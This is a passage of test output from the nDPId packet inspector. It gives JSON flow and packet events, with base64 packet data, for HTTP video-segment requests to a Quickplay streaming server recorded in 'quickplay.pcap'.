/ugxOOk4+twmaL+UUbEqGDcxcAEBa5EyOAV7RfqezgWcaQ3dbJjWXdNWxetLCdQ7XanJt3eAkt933KoymlC4XmU95LAhWF33+FFwL3BYas4y5X8wDDUnULI8QtkzKEN2oLGgIewtkuDrW4wpL3EZsIKv86JV8UzFxUMaP2MiczrH7WqOOsj1ytSR\/mRWDeXJftrtXq0qR46GntPeDZXJQKpY9CB2cQr+2LnDbM8iBOGE8HrF8a0W0JfepPoC6ozHQ5CxM0HE7L3V4aaQ=="} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1429000156459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000156459,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaip0AAPwZH9go2qfp4HCMoyzEAUC00XE7dy64AUBhgH5dQAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDkudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":112,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1429000052350,"flow_last_seen":1429000055158,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1429000184253,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000207973,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYfhkAAPwbLFwo2qfp4HCMoyzIAUDz1EP7kfsOCUBgByRv\/AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTIudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000207973,"flow_last_seen":1429000207973,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000207973,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0052.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1429000210014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":128,"pkt_l4_len":92,"thread_ts_msec":1429000210014,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHCiFUAArQbb4XgcIygKNqn6AFDLMuSI3uA89RK8UBgIIiZoAAA7o06lOUMR9b0tN4NqWqjYHmUkbAcezqY5k1Ckm0MtYSmllf\/mEyyNorAHBlAKlc3tlqWmVMYy6YLe45g7yxi7BP1GlteorxU="} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1429000210215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000210215,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYhUEAAPwbJTQo2qfp4HCMoyzIAUDz1ErzkiN8oUBhgH586AABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTMudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000237766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYTSEAAPwbXVQo2qfp4HCMoyzMAUBi\/CFv73vENUBgByQDsAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTUudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000237766,"flow_last_seen":1429000237766,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000237766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0055.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1429000239838,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":652,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":652,"pkt_l4_len":616,"thread_ts_msec":1429000239838,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAnwr2EAArAZRE3gcIygKNqn6AFDLM\/vq+JsYvwoZUBgIInF9AABzYj3YcVRlOp3c+LTFyFpK8hJq+9ow2Mvt7DtOuHGzxpnR+3r13CHw+E3iWLlq+exgWJJWm8EH8pTbwRe+x8\/D4xNXRBwksI9Csb4QsiJPsfT2+RDiLS02aidPx7uSbhK8jMvrBH5tHxdpa1MFSWCqjYPTrHUzNzOA9TY5FgYYDDMkEDm7gO5123w4n1MAhsXStfcoQ3nSRMywWBjQbHZWkL++gHWx\/\/bzYnpJ21s22WZTz+idJIBFeazv4DxMARlrjHvFswfnI5PHnRRlJ35I7r1qBSMNM3mL3d8eBq5Li+cUyPU9itxuknh7PGxS38quOs1TDTVg7FntfS3WF5atx9VBXKTp0aVWtu3ILXC6hNWU\/3GWggrR0a3pT3Hg6QnXTm4c911OZjeTJVo9BcqKuNrC54rvRTCDA32\/HDU6hjsWUORfbA\/u7H1kGeJSFG\/fOMyzkamr7WzvqgnibwnuBc0xZxB9tpVk0llxH2XWzC3EK3M6+lvnjFarcNCJ93EYtE6CK75PtO2Yi7ZSrr3mOwYlgtK8Yp0yb7vwqI\/2DSjngCc+Sn1445B4mHIXhp7fd7CP2bpJi3Gy6qjSlxiy6iOAVea4ViBsitRQkSJFsgN9tKobyQWEjA0Iq\/LCYaZ8fynI94mgU9gbtQkXI5Y7NPc0FmJseEdZ62w2m6qgfXo6nPxb2wkFc\/k2DVuvOgbbk\/FGlh+lWIZwut4KOX\/pap\/MEzShFHEPoHfax3dVeu1dix8C0CE3+qvmRiSOV8\/NDfdKpdkErPHZ3dWKhtrNlCDmPw=="} +01057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1429000240020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000240020,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYVGUAAPwbVhAo2qfp4HCMoyzMAUBi\/Chn76vrvUBhgH5XpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNTYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000347103,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaYDkAAPwZSjwo2qfp4HCMoyzUAUMz93a23S9rhUBgBydEWAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjYudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000347103,"flow_last_seen":1429000347103,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000347103,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0066.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +02077{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1429000350324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1248,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1248,"pkt_l4_len":1212,"thread_ts_msec":1429000350324,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBNBb\/EAArQYdm3gcIygKNqn6AFDLNbdZW8fM\/d9rUBgIIqcYAAD+T5O3IPZmBv71L8WfkixgJr\/jAt3\/6kLgAlGb+bz0ykowoo+NPkYJoM9UpoIVOvy80c0V1g1txC7AgybX1gMQCPuO2tL7\/YFSRxMejmWc4iVxTJSsqhfOA46142Bs1WbBta5O\/SisV8I6pVbO3GCxSbhFLwGr\/WZMUvJFa03S2huv7nozg+bdD4ixlKAFqDdBblAS5LqKSvj+fOg7qedCUtEMdl2BX1M92lt5m6MQhdflPtDytEcZ0QkUCdMH9OHvhlDAvSTeyAtHyfYMIr7y2wFDjfyFOM32EeqMcgEsS0MQwjTKiEkzEJ8uGfrxRfO5oVpc6VJ+xU5oxB5UzhG8pmTwc93Y2+GfYxPPy6ggTaHy\/d8I7FePvcMuO0KR+65nFfpCrRJnDXWI0WHUQIZcOwglbU1AfE\/G0U1NohfpkoAAnwPGa2AwV3oZoMhAulbVmnnznep4SXoywe87c2ocX2ggVFcYGvjslls5jM+9Mb9jAiJUQob+ptDy09gH34DekuerUkd5kD0BHNFL1qJxKuT2KFfpVgoJcv7HmFi278ssvmuhcKYTndrOnym+1tTrX4yHchzxBIO6GaHA8tKeIbQel4TL1v3Z16t\/5xrJ+Q3\/dZxmuZuNaR\/mbOEVBLzpZG7JjcrFSlppStGfqcXspmqu2LVEQvyEoz7nD3cdIKrnhCpQD85sNyvZh8JPCYo865M5+VSfDtodRJdJU1Nl6DW0MAcLqRvHQY9JW8lvPNvqOY2adRWmAKu7tqvblHXcRcfi1rVtS37DAzU+CITvUZ7K30LaIGtCPuD1JyxuUKBexT3QohOr8Lhst8RR1CzAUG3EjerjlJS4KtFHtNg7GoK88LreN47H4SdxDkAmboeyFID9kUTvhDEEqXlfFOEyBf9Hwqltx9X6rJI\/aCSw0l3eGOtTl3BrAC\/PZaQloz6cS6y\/rAG\/nTUo2JYn9FxvYyn46cJ+Dvj0skCnbuZGkNTSODQ8OYRf91rdXgsLkXz7SvGaVdHhOR9kAXFpWZO7NlKFm7iCcjRGcikx0R+JzsCdgGKw769t40JLLZ2Q7I1fg8xfNUu24vDeA30lrnpOU4r2\/wzGdHdMyj3aW37T\/Pa6QQtQ1KDPtl9xaYHV7eAXl7B\/PrlRzNCxrvA6rIktFl32wWbaV4UONT7uV+4MsIL+HjkWP1O8dgLKVVeYmic1ZUfE8n13QHUcKgu1wZjEhZIqzgLo+waSjiNdfhALL5AB0EpMQXn5\/7OVD3m88BGmhRFUOC2MbYjnNMzH8wAwic5A3Qvz2AIrONrzFcniz\/ItQB42w6KG1uQ+E3nY7gSAkYQOrbzozKOWRZnp2uAnHe4PHe\/OVrr8C50\/kt0TKX5CZ2FJOOqCL0f72chb\/rBb5J0abgAXFRf0RhFz8NBfmLRVAS8iJvF+ExsNR3UUz7Uik5Fcuqlhq\/2+nOX6Vo3ZiRGJ8ebb8KS1vBD76QQNsXfNVIC2g\/pLfmhdq8Adxob5YnXButMrysl7iAokGOqWwh8nWfQCWcnR9MCedQ9mTBrHLXrhSeAVZOjGNYrbH8nHmLOBBy1qB3E4YD0wwrTIH9U0Sgt1"} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1429000350578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000350578,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeaaEUAAPwZQjAo2qfp4HCMoyzUAUMz932u3WWBvUBhgH+pmAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjcudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000375190,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeYAQEAAPwbqXQo2qfp4HCMoyzYAUPnxUPbwb7kUUBgByReCAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNjgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000375190,"flow_last_seen":1429000375190,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000375190,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0068.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 